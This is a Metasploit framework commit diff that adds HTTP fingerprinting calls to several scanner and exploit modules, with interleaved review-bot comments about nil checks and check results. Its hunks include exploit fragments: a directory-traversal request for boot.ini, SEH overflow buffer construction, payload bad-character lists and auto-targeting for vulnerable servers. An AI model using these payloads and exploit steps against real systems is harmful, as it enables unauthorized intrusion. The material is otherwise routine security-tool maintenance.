add http_fingerprint calls to modules that use various headers
git-svn-id: file:///home/svn/framework3/trunk@9627 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
2ab5983e2a
commit
12fbdcd878
|
@ -42,10 +42,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run_host(ip)
|
||||
|
||||
begin
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => '/',
|
||||
}, 25)
|
||||
res = send_request_raw(
|
||||
{
|
||||
'method' => 'GET',
|
||||
'uri' => '/',
|
||||
}, 25)
|
||||
|
||||
http_fingerprint({ :response => res })
|
||||
|
||||
if (res and res.code == 200)
|
||||
|
||||
|
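Review bot: `http_fingerprint({ :response => res })` runs before the `res and res.code == 200` guard, so a timed-out `send_request_raw` hands it a nil response; whether the helper tolerates nil is not visible in this hunk. Unless it is known to, guard the call: `http_fingerprint({ :response => res }) if res`. The `begin` block continues past the hunk, so any `rescue` that would catch a resulting NoMethodError is not visible either.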
@ -133,4 +136,3 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -9,10 +9,8 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -23,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Name' => 'TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module tests for directory traversal vulnerability in the UpdateAgent
|
||||
This module tests for directory traversal vulnerability in the UpdateAgent
|
||||
function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro
|
||||
OfficeScan. This allows remote attackers to read arbitrary files as SYSTEM
|
||||
via dot dot sequences in an HTTP request.
|
||||
|
@ -40,17 +38,20 @@ class Metasploit3 < Msf::Auxiliary
|
|||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(26122),
|
||||
], self.class)
|
||||
[
|
||||
Opt::RPORT(26122),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(target_host)
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => '/activeupdate/../../../../../../../../../../../boot.ini',
|
||||
'method' => 'GET',
|
||||
}, 20)
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => '/activeupdate/../../../../../../../../../../../boot.ini',
|
||||
'method' => 'GET',
|
||||
}, 20)
|
||||
|
||||
http_fingerprint({ :response => res })
|
||||
|
||||
if (res.code >= 200)
|
||||
if (res.body =~ /boot/)
|
||||
|
|
|
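Review bot: `if (res.code >= 200)` dereferences `res` with no nil check, so a timed-out or refused request raises NoMethodError instead of reporting nothing, and the newly added `http_fingerprint({ :response => res })` above it receives the same possibly-nil value. Add `return unless res` right after `send_request_raw`, or change the condition to `if (res and res.code >= 200)`. `res.code >= 200` also accepts 3xx/4xx/5xx responses, which is only harmless because the `res.body =~ /boot/` match is the real test. `run_host` continues outside the hunk.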
@ -22,10 +22,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
super(update_info(info,
|
||||
'Name' => 'JBoss Vulnerability Scanner',
|
||||
'Description' => %q{
|
||||
This module scans a JBoss instance for vulnerablities.
|
||||
This module scans a JBoss instance for a few vulnerablities.
|
||||
},
|
||||
'Version' => '$Revision$',
|
||||
'Author' => [ 'Tyler Krpata' ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-0738' ] # VERB auth bypass
|
||||
],
|
||||
'License' => BSD_LICENSE
|
||||
))
|
||||
|
||||
|
@ -39,14 +43,16 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run_host(ip)
|
||||
print_status("Processing IP #{ip}")
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "/"+Rex::Text.rand_text_alpha(12),
|
||||
'method' => 'GET',
|
||||
'ctype' => 'text/plain',
|
||||
}, 20)
|
||||
if (xpb = res.headers['X-Powered-By'])
|
||||
print_status("X-Powered-By: #{xpb}")
|
||||
end
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => "/"+Rex::Text.rand_text_alpha(12),
|
||||
'method' => 'GET',
|
||||
'ctype' => 'text/plain',
|
||||
}, 20)
|
||||
|
||||
info = http_fingerprint({ :response => res })
|
||||
print_status(info)
|
||||
|
||||
if(res.body and />(JBoss[^<]+)/.match(res.body) )
|
||||
print_status("JBoss error message: #{$1}")
|
||||
end
|
||||
|
|
|
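Review bot: `res.body` in `if(res.body and />(JBoss[^<]+)/.match(res.body) )` is reached with no check that `res` is non-nil, so a timeout raises NoMethodError; the new `info = http_fingerprint({ :response => res })` and `print_status(info)` lines sit in the same unguarded path. Add `return unless res` directly after `send_request_cgi`, and use `print_status(info) if info` if the fingerprint helper can return nil. `run_host` continues outside the hunk.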
@ -67,12 +67,16 @@ class Metasploit3 < Msf::Auxiliary
|
|||
get_source = Rex::Text.uri_encode("::$data")
|
||||
|
||||
begin
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => "/#{uri}#{get_source}",
|
||||
}, 25)
|
||||
res = send_request_raw(
|
||||
{
|
||||
'method' => 'GET',
|
||||
'uri' => "/#{uri}#{get_source}",
|
||||
}, 25)
|
||||
|
||||
version = res.headers['Server'] if res
|
||||
if res
|
||||
version = res.headers['Server']
|
||||
http_fingerprint({ :response => res })
|
||||
end
|
||||
|
||||
if vuln_versions.include?(version)
|
||||
print_good("#{target_url} - nginx - Vulnerable version: #{version}")
|
||||
|
|
|
@ -67,6 +67,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'uri' => "/manager/html",
|
||||
'method' => 'GET'
|
||||
}, 25)
|
||||
http_fingerprint({ :response => res })
|
||||
rescue ::Rex::ConnectionError => e
|
||||
vprint_error("http://#{rhost}:#{rport}/manager/html - #{e}")
|
||||
return
|
||||
|
|
|
@ -43,6 +43,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
if res and res.code == 200
|
||||
|
||||
http_fingerprint({ :response => res })
|
||||
|
||||
tserver = res.headers['Server']
|
||||
|
||||
if (res.headers['DAV'] == '1, 2') and (res.headers['MS-Author-Via'].match('DAV'))
|
||||
|
@ -54,12 +56,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_status("#{target_host} (#{tserver}) has #{wdtype} ENABLED")
|
||||
|
||||
report_note(
|
||||
:host => target_host,
|
||||
:proto => 'HTTP',
|
||||
:port => rport,
|
||||
:type => wdtype,
|
||||
:data => 'enabled'
|
||||
)
|
||||
{
|
||||
:host => target_host,
|
||||
:proto => 'HTTP',
|
||||
:port => rport,
|
||||
:type => wdtype,
|
||||
:data => 'enabled'
|
||||
})
|
||||
|
||||
else
|
||||
print_status("#{target_host} (#{tserver}) WebDAV disabled.")
|
||||
|
|
|
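Review bot: `res.headers['MS-Author-Via'].match('DAV')` raises NoMethodError when that header is absent, and the `res.code == 200` guard that now also covers the new `http_fingerprint` call does not protect it; only the `DAV` header is compared safely with `==`. Use `res.headers['MS-Author-Via'].to_s.match('DAV')` or `res.headers['MS-Author-Via'] =~ /DAV/` so a server that sends `DAV: 1, 2` without `MS-Author-Via` is reported as WebDAV disabled rather than crashing the scan. The `run_host` method starts outside the hunk.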
@ -117,21 +117,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
res = send_request_raw(
|
||||
{
|
||||
'method' => 'OPTIONS',
|
||||
'proto' => 'HTTP',
|
||||
'version' => '1.0',
|
||||
'uri' => datastore['PATH']
|
||||
}, 5)
|
||||
|
||||
res = send_request_raw({
|
||||
'method' => 'OPTIONS',
|
||||
'proto' => 'HTTP',
|
||||
'version' => '1.0',
|
||||
'uri' => datastore['PATH']
|
||||
}, 5)
|
||||
|
||||
if res and res['Server']
|
||||
print_status("Found server: #{res['Server']}")
|
||||
info = http_fingerprint({ :response => res })
|
||||
if (info =~ /Sun/)
|
||||
print_status("Found server: #{info}")
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
|
|
@ -236,6 +236,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
http_fingerprint({ :response => res })
|
||||
|
||||
if (res.code != 200)
|
||||
print_status("The server returned #{res.code} #{res.message}")
|
||||
return Exploit::CheckCode::Safe
|
||||
|
|
|
@ -32,15 +32,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
[ 'CVE', '2002-1643' ],
|
||||
[ 'OSVDB', '4468'],
|
||||
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html'],
|
||||
|
||||
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html']
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 2000,
|
||||
'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d",
|
||||
|
||||
'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d"
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
|
@ -56,19 +54,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
res = send_request_raw({
|
||||
'method' => 'OPTIONS',
|
||||
'proto' => 'RTSP',
|
||||
'version' => '1.0',
|
||||
'uri' => '/'
|
||||
}, 5)
|
||||
res = send_request_raw(
|
||||
{
|
||||
'method' => 'OPTIONS',
|
||||
'proto' => 'RTSP',
|
||||
'version' => '1.0',
|
||||
'uri' => '/'
|
||||
}, 5)
|
||||
|
||||
info = http_fingerprint({ :response => res })
|
||||
if res and res['Server']
|
||||
print_status("Found RTSP: #{res['Server']}")
|
||||
return Exploit::CheckCode::Detected
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
|
|
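Review bot: `info = http_fingerprint({ :response => res })` assigns a value that is never read — the decision below still keys off `res['Server']` — and the trailing `Exploit::CheckCode::Safe` after the `if/else` is unreachable because both branches `return`. Either drop the assignment (`http_fingerprint({ :response => res })`) or use it, e.g. `print_status("Found RTSP: #{info}")`, and delete the dead `Safe` line. The request is sent with `'proto' => 'RTSP'`; whether the HTTP fingerprint helper produces anything meaningful for an RTSP response is not visible here and is worth a comment if it is intended.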
@ -61,17 +61,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URI'] + "/tiki-index.php",
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
res = send_request_raw(
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 5)
|
||||
'uri' => datastore['URI'] + "/tiki-index.php",
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 5)
|
||||
|
||||
if (res and res.message == "OK" and res.body.match(/TikiWiki v?([0-9\.]*)/))
|
||||
http_fingerprint({ :response => res })
|
||||
|
||||
if (res and res.code == 200 and res.body.match(/TikiWiki v?([0-9\.]*)/))
|
||||
ver = $1
|
||||
#print_status("Detected TikiWiki version #{ver}")
|
||||
ver = ver.split('.')
|
||||
|
@ -89,8 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
|
|
@ -62,21 +62,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URI'] + "/tiki-index.php",
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
res = send_request_raw(
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 25)
|
||||
'uri' => datastore['URI'] + "/tiki-index.php",
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 25)
|
||||
|
||||
if (res and res.message == "OK" and res.body.match(/TikiWiki 1\.9\.4/))
|
||||
http_fingerprint({ :response => res })
|
||||
|
||||
if (res and res.code == 200 and res.body.match(/TikiWiki 1\.9\.4/))
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
|
|
@ -81,6 +81,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'uri' => '/SecurityGateway.dll'
|
||||
}, 10)
|
||||
|
||||
http_fingerprint({ :response => res })
|
||||
|
||||
if (res and res.headers['Server'] =~ /SecurityGateway (1\..*)$/)
|
||||
case $1
|
||||
when /1\.0\.1/
|
||||
|
@ -98,7 +100,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# handle auto-targeting
|
||||
mytarget = target
|
||||
if target.name =~ /Automatic/
|
||||
|
||||
mytarget = auto_target
|
||||
if mytarget.nil?
|
||||
raise RuntimeError, "Unable to automatically select a target"
|
||||
|
|
|
@ -161,6 +161,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def check
|
||||
response = send_request_raw({'uri' => '/'}, 5)
|
||||
|
||||
http_fingerprint({ :response => response })
|
||||
|
||||
if response.nil?
|
||||
print_status("No response to request")
|
||||
return Exploit::CheckCode::Safe
|
||||
|
@ -194,6 +196,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def auto_target
|
||||
response = send_request_raw({'uri' => '/'}, 5)
|
||||
|
||||
http_fingerprint({ :response => response })
|
||||
|
||||
targets_to_try = []
|
||||
|
||||
if response.nil?
|
||||
|
|
|
@ -57,21 +57,28 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DisclosureDate' => 'Aug 14 2007',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options([
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(80),
|
||||
OptString.new('PATH', [ true, "Installation path of Easy Chat Server",
|
||||
"C:\\Program Files\\Easy Chat Server" ])
|
||||
], self.class )
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_raw
|
||||
def auto_target
|
||||
info = http_fingerprint
|
||||
t = nil
|
||||
if (info =~ /Easy Chat Server\/1\.0/)
|
||||
t = targets[0]
|
||||
end
|
||||
t
|
||||
end
|
||||
|
||||
if res and res['Server'] =~ /Easy Chat Server\/1.0/
|
||||
def check
|
||||
if auto_target
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -79,9 +86,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
val = rand_text_alpha(rand(10) + 1)
|
||||
num = rand_text_numeric(1)
|
||||
|
||||
# exploit buffer.
|
||||
path = datastore['PATH'] + "\\users\\"
|
||||
print_status("path: " + path)
|
||||
|
||||
# exploit buffer.
|
||||
filler = rand_text_alpha(256 - path.length)
|
||||
seh = generate_seh_payload(target.ret)
|
||||
juju = filler + seh
|
||||
|
|
|
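Review bot: `filler = rand_text_alpha(256 - path.length)` goes negative when the user-controlled `PATH` option plus `\\users\\` exceeds 256 characters, so the overflow layout silently breaks; what `rand_text_alpha` does with a negative length is not visible here. Guard before building the buffer: `raise RuntimeError, "PATH too long (#{path.length} > 256)" if path.length > 256`. The `def exploit` for this code is in the previous hunk, and `check` now goes through `auto_target`, which calls `http_fingerprint` with no response argument and therefore issues its own request.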
@ -51,15 +51,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
response = send_request_raw
|
||||
info = http_fingerprint
|
||||
|
||||
if response and
|
||||
response['Server'] and
|
||||
response['Server'] =~ /.*MailEnable/
|
||||
if (info =~ /.*MailEnable/)
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
|
|
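Review bot: the leading `.*` in `if (info =~ /.*MailEnable/)` is redundant in an unanchored match and only adds backtracking; `/MailEnable/` is equivalent. The rewrite also replaces the explicit `response['Server']` test with a match against the whole fingerprint string, so any fingerprint field containing "MailEnable" now yields `Appears` — fine if intended, but worth a comment such as `# matches any fingerprint field, not just Server`. If `http_fingerprint` returns nil when there is no response, `nil =~ /MailEnable/` is nil and the method falls through to `Safe`, which is the wanted behaviour.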
@ -9,10 +9,8 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
|
@ -22,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Microsoft IIS ISAPI w3who.dll Query String Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in the w3who.dll ISAPI
|
||||
This module exploits a stack buffer overflow in the w3who.dll ISAPI
|
||||
application. This vulnerability was discovered Nicolas
|
||||
Gregoire and this code has been successfully tested against
|
||||
Windows 2000 and Windows XP (SP2). When exploiting Windows
|
||||
|
@ -35,11 +33,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2004-1134'],
|
||||
[ 'OSVDB', '12258'],
|
||||
[ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html'],
|
||||
[ 'BID', '11820'],
|
||||
|
||||
[ 'CVE', '2004-1134' ],
|
||||
[ 'OSVDB', '12258' ],
|
||||
[ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html' ],
|
||||
[ 'BID', '11820' ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DefaultOptions' =>
|
||||
|
@ -64,44 +61,50 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Dec 6 2004'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URL', [ true, "The path to w3who.dll", "/scripts/w3who.dll" ]),
|
||||
], self.class)
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URL', [ true, "The path to w3who.dll", "/scripts/w3who.dll" ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def auto_target
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => datastore['URL']
|
||||
}, -1)
|
||||
|
||||
http_fingerprint({ :response => res })
|
||||
|
||||
# Was a vulnerable system detected?
|
||||
t = nil
|
||||
if (res and res.body =~ /Access Token/)
|
||||
case res.headers['Server']
|
||||
when /5\.1/
|
||||
t = targets[2]
|
||||
else
|
||||
t = targets[1]
|
||||
end
|
||||
end
|
||||
t
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URL']
|
||||
}, -1)
|
||||
|
||||
if (res and res.body =~ /Access Token/)
|
||||
if auto_target
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
mytarget = target
|
||||
if (target.name =~ /Automatic/)
|
||||
mytarget = auto_target
|
||||
else
|
||||
mytarget = target
|
||||
end
|
||||
|
||||
if(mytarget.name =~ /Automatic/)
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URL']
|
||||
}, -1)
|
||||
|
||||
# Was a vulnerable system detected?
|
||||
if (res and res.body =~ /Access Token/)
|
||||
case res.headers['Server']
|
||||
when /5\.1/
|
||||
mytarget = targets[2]
|
||||
else
|
||||
mytarget = targets[1]
|
||||
end
|
||||
else
|
||||
print_error("No valid target found")
|
||||
end
|
||||
if not mytarget
|
||||
raise RuntimeError, "No valid target found"
|
||||
end
|
||||
|
||||
buf = rand_text_english(8192, payload_badchars)
|
||||
|
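Review bot: `check` returns `Exploit::CheckCode::Vulnerable` whenever `auto_target` finds `Access Token` in the w3who.dll response body, but that only shows the ISAPI extension is installed and answering, not that it is an unpatched build; the other checks in this commit report that strength of evidence as `Appears` or `Detected`. Change the return to `return Exploit::CheckCode::Appears`. The `send_request_raw(..., -1)` timeout is carried over from the old code; if -1 means wait indefinitely, both `check` and `auto_target` can now hang on a host that accepts the connection and never answers.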
@ -120,4 +123,3 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|